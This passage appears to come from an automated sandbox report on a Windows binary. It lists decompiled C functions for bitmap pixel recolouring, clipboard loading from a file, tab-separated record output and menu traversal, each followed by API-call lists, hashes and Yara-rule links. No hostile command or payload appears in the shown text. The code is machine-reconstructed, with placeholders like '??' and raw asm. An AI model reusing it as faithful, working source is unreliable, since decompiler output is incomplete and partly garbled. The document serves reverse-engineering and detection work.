							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E004059AA( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                                                                                      0x0040caf2
                                                                                                                                                      0x0040cb00
                                                                                                                                                      0x0040cb0b
                                                                                                                                                      0x0040cb14
                                                                                                                                                      0x0040cb33
                                                                                                                                                      0x0040cb3b
                                                                                                                                                      0x0040cb83
                                                                                                                                                      0x0040cbcc
                                                                                                                                                      0x0040cb85
                                                                                                                                                      0x0040cb8b
                                                                                                                                                      0x0040cb99
                                                                                                                                                      0x0040cba5
                                                                                                                                                      0x0040cbb4
                                                                                                                                                      0x0040cbb9
                                                                                                                                                      0x0040cbc0
                                                                                                                                                      0x0040cbc5
                                                                                                                                                      0x0040cb3d
                                                                                                                                                      0x0040cb43
                                                                                                                                                      0x0040cb51
                                                                                                                                                      0x0040cb5d
                                                                                                                                                      0x0040cb6a
                                                                                                                                                      0x0040cb75
                                                                                                                                                      0x0040cb7a
                                                                                                                                                      0x0040cbd4
                                                                                                                                                      0x0040cbd7
                                                                                                                                                      0x0040cbd7
                                                                                                                                                      0x0040cb19
                                                                                                                                                      0x0040cb1a
                                                                                                                                                      0x0040cb1b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cb21
                                                                                                                                                      0x0040cb02
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • wcschr.MSVCRT ref: 0040CB0B
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                        • Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
                                                                                                                                                        • Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
                                                                                                                                                        • Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040CB6A
                                                                                                                                                      • wcscat.MSVCRT ref: 0040CB75
                                                                                                                                                      • memset.MSVCRT ref: 0040CB51
                                                                                                                                                        • Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
                                                                                                                                                        • Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0
                                                                                                                                                      • memset.MSVCRT ref: 0040CB99
                                                                                                                                                      • memcpy.MSVCRT ref: 0040CBB4
                                                                                                                                                      • wcscat.MSVCRT ref: 0040CBC0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                      • Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                      • Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
                                                                                                                                                      • Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                      • Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402DE1, Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E00402DE1(void* __fp0) {
				void* _v24;
				void _v28;
				void* _v56;
				intOrPtr _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				intOrPtr _v84;
				long _v88;
				intOrPtr _v92;
				int _v96;
				int _v100;
				intOrPtr _v104;
				int _v108;
				int _v112;
				intOrPtr _v128;
				unsigned int _t51;
				signed char _t52;
				intOrPtr _t53;
				intOrPtr _t64;
				struct HDC__* _t75;

				_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v56, 0x18,  &_v28);
				_t75 = CreateCompatibleDC(0);
				_v64 = SelectObject(_t75, _v72);
				_v72 = GetSysColor(0xf);
				_v88 = GetPixel(_t75, 0, 0);
				_v96 = 0;
				if(_v56 > 0) {
					do {
						_v100 = 0;
						if(_v60 > 0) {
							do {
								_t51 = GetPixel(_t75, _v100, _v96);
								if(_t51 != _v100) {
									_t52 = _t51 & 0x000000ff;
									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
									asm("fild dword [esp+0x20]");
									asm("fistp qword [esp+0x28]");
									_t64 = _v84;
									_v92 = _t64;
									asm("fisub dword [esp+0x20]");
									asm("fldz");
									asm("fcomp st0, st1");
									asm("fnstsw ax");
									if((_t52 & 0x00000041) == 0) {
										asm("fchs");
									}
									asm("fcomp qword [0x410b70]");
									asm("fnstsw ax");
									_t53 = _t64 + 1;
									if((_t52 & 0x00000001) != 0) {
										_t53 = _t64;
									}
									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
								} else {
									_push(_v96);
								}
								SetPixel(_t75, _v112, _v108, ??);
								_v128 = _v128 + 1;
							} while (_v128 < _v88);
						}
						_v96 = _v96 + 1;
					} while (_v96 < _v56);
				}
				SelectObject(_t75, _v76);
				DeleteDC(_t75);
				return _v104;
			}
























                                                                                                                                                      0x00402e07
                                                                                                                                                      0x00402e0d
                                                                                                                                                      0x00402e15
                                                                                                                                                      0x00402e16
                                                                                                                                                      0x00402e17
                                                                                                                                                      0x00402e18
                                                                                                                                                      0x00402e19
                                                                                                                                                      0x00402e25
                                                                                                                                                      0x00402e36
                                                                                                                                                      0x00402e41
                                                                                                                                                      0x00402e54
                                                                                                                                                      0x00402e5e
                                                                                                                                                      0x00402e62
                                                                                                                                                      0x00402e66
                                                                                                                                                      0x00402e6c
                                                                                                                                                      0x00402e70
                                                                                                                                                      0x00402e74
                                                                                                                                                      0x00402e7a
                                                                                                                                                      0x00402e83
                                                                                                                                                      0x00402e89
                                                                                                                                                      0x00402e9c
                                                                                                                                                      0x00402ea3
                                                                                                                                                      0x00402ea7
                                                                                                                                                      0x00402eb3
                                                                                                                                                      0x00402eb7
                                                                                                                                                      0x00402ebb
                                                                                                                                                      0x00402ebf
                                                                                                                                                      0x00402ec3
                                                                                                                                                      0x00402ec5
                                                                                                                                                      0x00402ec7
                                                                                                                                                      0x00402ecc
                                                                                                                                                      0x00402ece
                                                                                                                                                      0x00402ece
                                                                                                                                                      0x00402ed0
                                                                                                                                                      0x00402ed6
                                                                                                                                                      0x00402edb
                                                                                                                                                      0x00402ede
                                                                                                                                                      0x00402ee0
                                                                                                                                                      0x00402ee0
                                                                                                                                                      0x00402ef6
                                                                                                                                                      0x00402e8b
                                                                                                                                                      0x00402e8b
                                                                                                                                                      0x00402e8b
                                                                                                                                                      0x00402f00
                                                                                                                                                      0x00402f06
                                                                                                                                                      0x00402f0e
                                                                                                                                                      0x00402e7a
                                                                                                                                                      0x00402f18
                                                                                                                                                      0x00402f20
                                                                                                                                                      0x00402e6c
                                                                                                                                                      0x00402f2f
                                                                                                                                                      0x00402f36
                                                                                                                                                      0x00402f46

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                      • LoadImageW.USER32 ref: 00402E01
                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                      • SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2468767547-0
                                                                                                                                                      • Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                      • Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
                                                                                                                                                      • Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                      • Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405F82, Relevance: 16.6, APIs: 11, Instructions: 82COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                      			E00405F82() {
				int _v8;
				int _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				struct HDC__* _t46;

				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
				_v52 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetObjectW(_v16, 0x18,  &_v52);
				_t46 = CreateCompatibleDC(0);
				_v28 = SelectObject(_t46, _v16);
				_v24 = GetSysColor(0xf);
				_v20 = GetPixel(_t46, 0, 0);
				_v12 = 0;
				if(_v44 > 0) {
					do {
						_v8 = 0;
						if(_v48 > 0) {
							do {
								if(GetPixel(_t46, _v8, _v12) == _v20) {
									SetPixel(_t46, _v8, _v12, _v24);
								}
								_v8 = _v8 + 1;
							} while (_v8 < _v48);
						}
						_v12 = _v12 + 1;
					} while (_v12 < _v44);
				}
				SelectObject(_t46, _v28);
				DeleteDC(_t46);
				return _v16;
			}













                                                                                                                                                      0x00405fa5
                                                                                                                                                      0x00405faa
                                                                                                                                                      0x00405fb0
                                                                                                                                                      0x00405fb1
                                                                                                                                                      0x00405fb2
                                                                                                                                                      0x00405fb3
                                                                                                                                                      0x00405fb4
                                                                                                                                                      0x00405fbe
                                                                                                                                                      0x00405fce
                                                                                                                                                      0x00405fd9
                                                                                                                                                      0x00405feb
                                                                                                                                                      0x00405ff3
                                                                                                                                                      0x00405ff6
                                                                                                                                                      0x00405ff9
                                                                                                                                                      0x00405ffb
                                                                                                                                                      0x00405ffe
                                                                                                                                                      0x00406001
                                                                                                                                                      0x00406003
                                                                                                                                                      0x0040600f
                                                                                                                                                      0x0040601b
                                                                                                                                                      0x0040601b
                                                                                                                                                      0x00406021
                                                                                                                                                      0x00406027
                                                                                                                                                      0x00406003
                                                                                                                                                      0x0040602c
                                                                                                                                                      0x00406032
                                                                                                                                                      0x00405ffb
                                                                                                                                                      0x0040603b
                                                                                                                                                      0x00406042
                                                                                                                                                      0x0040604f

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                      • LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                      • SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2468767547-0
                                                                                                                                                      • Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                      • Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
                                                                                                                                                      • Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                      • Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00405559, Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t17;
				void* _t32;
				void* _t37;
				long _t39;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t17 = E00405338(_a4);
				_v12 = _t17;
				if(_t17 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t39 = GetFileSize(_t17, 0);
					_t5 = _t39 + 2; // 0x2
					_t32 = GlobalAlloc(0x2000, _t5);
					if(_t32 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t37 = GlobalLock(_t32);
						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
							GlobalUnlock(_t32);
							SetClipboardData(0xd, _t32);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                                                                                                                      0x0040555f
                                                                                                                                                      0x00405563
                                                                                                                                                      0x0040556c
                                                                                                                                                      0x00405575
                                                                                                                                                      0x00405578
                                                                                                                                                      0x004055f1
                                                                                                                                                      0x0040557a
                                                                                                                                                      0x00405586
                                                                                                                                                      0x00405588
                                                                                                                                                      0x00405597
                                                                                                                                                      0x0040559b
                                                                                                                                                      0x004055d4
                                                                                                                                                      0x004055da
                                                                                                                                                      0x0040559d
                                                                                                                                                      0x004055a6
                                                                                                                                                      0x004055b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004055bb
                                                                                                                                                      0x004055bd
                                                                                                                                                      0x004055c3
                                                                                                                                                      0x004055cc
                                                                                                                                                      0x004055cc
                                                                                                                                                      0x004055b9
                                                                                                                                                      0x004055e0
                                                                                                                                                      0x004055e8
                                                                                                                                                      0x004055f4
                                                                                                                                                      0x004055fe

                                                                                                                                                      APIs
                                                                                                                                                      • EmptyClipboard.USER32 ref: 00405563
                                                                                                                                                        • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
                                                                                                                                                      • GlobalLock.KERNEL32 ref: 0040559E
                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004055C3
                                                                                                                                                      • SetClipboardData.USER32 ref: 004055CC
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004055D4
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004055E0
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004055EB
                                                                                                                                                      • CloseClipboard.USER32 ref: 004055F4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                      • Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                      • Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
                                                                                                                                                      • Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                      • Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040228C, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 137timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                      			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				struct _SYSTEMTIME _v88;
				void* _v92;
				struct _FILETIME _v96;
				void* __edi;
				signed int _t29;
				signed int _t34;
				signed int _t39;
				char* _t44;
				void* _t56;
				signed int _t60;
				signed int _t64;
				signed int _t70;
				signed int _t77;
				long _t90;
				intOrPtr _t91;
				void* _t97;
				signed int _t98;
				signed int _t99;

				_t97 = __esi;
				_t81 =  *((intOrPtr*)(__esi + 0x10));
				_t91 = _a4;
				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
				_t77 = 0x40f454;
				if(_t29 != 0) {
					_t77 = _t29;
				}
				_t99 = _t98 | 0xffffffff;
				_t106 =  *(_t97 + 0x40) & 0x00004000;
				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
					E004063DD(_t99, _t81, _t91, _t106, ".");
				}
				E004063DD(_t99, _t81, _t91, _t106, _t77);
				_t78 = "\t";
				E004063DD(_t99, _t81, _t91, _t106, "\t");
				_t107 =  *(_t97 + 0x40) & 0x00004000;
				_t34 = _t99;
				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
					_push(L"FALSE");
				} else {
					_push(L"TRUE");
				}
				E004063DD(_t34, _t81, _t91, _t107);
				E004063DD(_t99, _t81, _t91, _t107);
				_t82 =  *((intOrPtr*)(_t97 + 0x14));
				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
				_t108 = _t39;
				if(_t39 == 0) {
					_t39 = 0x40f454;
				}
				E004063DD(_t99, _t82, _t91, _t108, _t39);
				E004063DD(_t99, _t82, _t91, _t108, _t78);
				_t109 =  *(_t97 + 0x40) & 0x00000001;
				_t44 = L"TRUE";
				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
					_t44 = L"FALSE";
				}
				E004063DD(_t99, _t82, _t91, _t109, _t44);
				E004063DD(_t99, _t82, _t91, _t109, _t78);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v88.wYear = 0x7b2;
				_v88.wDay = 1;
				_v88.wMonth = 1;
				SystemTimeToFileTime( &_v88,  &_v96);
				_t90 = _v96.dwLowDateTime;
				asm("sbb ecx, edi");
				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
				_push(_t90);
				_push(_t56);
				_push(L"%I64d");
				_push(0x1f);
				_push( &_v88);
				L0040DFD6();
				_t96 = _v20;
				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
				_t80 = "\t";
				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
				_t85 =  *((intOrPtr*)(_t97 + 0x18));
				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
				_t110 = _t64;
				if(_t64 == 0) {
					_t64 = 0x40f454;
				}
				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
				_t111 = _t70;
				if(_t70 == 0) {
					_t70 = 0x40f454;
				}
				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
			}






















                                                                                                                                                      0x0040228c
                                                                                                                                                      0x0040228c
                                                                                                                                                      0x00402295
                                                                                                                                                      0x0040229e
                                                                                                                                                      0x004022a5
                                                                                                                                                      0x004022aa
                                                                                                                                                      0x004022ac
                                                                                                                                                      0x004022ac
                                                                                                                                                      0x004022ae
                                                                                                                                                      0x004022b1
                                                                                                                                                      0x004022b7
                                                                                                                                                      0x004022c0
                                                                                                                                                      0x004022c0
                                                                                                                                                      0x004022c8
                                                                                                                                                      0x004022cd
                                                                                                                                                      0x004022d5
                                                                                                                                                      0x004022da
                                                                                                                                                      0x004022e0
                                                                                                                                                      0x004022e2
                                                                                                                                                      0x004022eb
                                                                                                                                                      0x004022e4
                                                                                                                                                      0x004022e4
                                                                                                                                                      0x004022e4
                                                                                                                                                      0x004022f0
                                                                                                                                                      0x004022f8
                                                                                                                                                      0x004022fd
                                                                                                                                                      0x00402305
                                                                                                                                                      0x0040230a
                                                                                                                                                      0x0040230c
                                                                                                                                                      0x0040230e
                                                                                                                                                      0x0040230e
                                                                                                                                                      0x00402316
                                                                                                                                                      0x0040231e
                                                                                                                                                      0x00402323
                                                                                                                                                      0x00402327
                                                                                                                                                      0x0040232c
                                                                                                                                                      0x0040232e
                                                                                                                                                      0x0040232e
                                                                                                                                                      0x00402336
                                                                                                                                                      0x0040233e
                                                                                                                                                      0x00402349
                                                                                                                                                      0x0040234a
                                                                                                                                                      0x0040234b
                                                                                                                                                      0x0040234c
                                                                                                                                                      0x00402358
                                                                                                                                                      0x0040235f
                                                                                                                                                      0x00402366
                                                                                                                                                      0x0040236d
                                                                                                                                                      0x0040238d
                                                                                                                                                      0x00402399
                                                                                                                                                      0x0040239d
                                                                                                                                                      0x004023a2
                                                                                                                                                      0x004023a3
                                                                                                                                                      0x004023a4
                                                                                                                                                      0x004023ad
                                                                                                                                                      0x004023af
                                                                                                                                                      0x004023b0
                                                                                                                                                      0x004023b5
                                                                                                                                                      0x004023c7
                                                                                                                                                      0x004023cc
                                                                                                                                                      0x004023d5
                                                                                                                                                      0x004023da
                                                                                                                                                      0x004023e4
                                                                                                                                                      0x004023e9
                                                                                                                                                      0x004023eb
                                                                                                                                                      0x004023ed
                                                                                                                                                      0x004023ed
                                                                                                                                                      0x004023ff
                                                                                                                                                      0x00402404
                                                                                                                                                      0x00402409
                                                                                                                                                      0x0040240e
                                                                                                                                                      0x00402410
                                                                                                                                                      0x00402412
                                                                                                                                                      0x00402412
                                                                                                                                                      0x00402433

                                                                                                                                                      APIs
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
                                                                                                                                                      • __aulldiv.LIBCMT ref: 0040239D
                                                                                                                                                      • _snwprintf.MSVCRT ref: 004023B0
                                                                                                                                                        • Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
                                                                                                                                                        • Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
                                                                                                                                                      • String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
                                                                                                                                                      • API String ID: 1007903050-2074899967
                                                                                                                                                      • Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                      • Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
                                                                                                                                                      • Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                      • Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040699E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 48%
                                                                                                                                                      			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
				wchar_t* _v0;
				int _v4;
				int _t39;
				wchar_t* _t49;
				void* _t51;
				int _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E0040E340(0x404c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a58, 0, 0x2000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E0040699E(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t67 = _a24;
						_a8256 = 0;
						memset( &_a8258, 0, 0x2000);
						_t49 = wcschr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x412c34 =  *0x412c34 + 1;
								_t68 =  *0x412c34; // 0x0
								_t67 = _t68 + 0x11558;
								__eflags = _t67;
							} else {
								_t67 = _v4 + 0x11171;
							}
						}
						_t51 = E00406D16(_t67,  &_a8256);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								wcscat( &_a8256, _v0);
								_pop(_t59);
							}
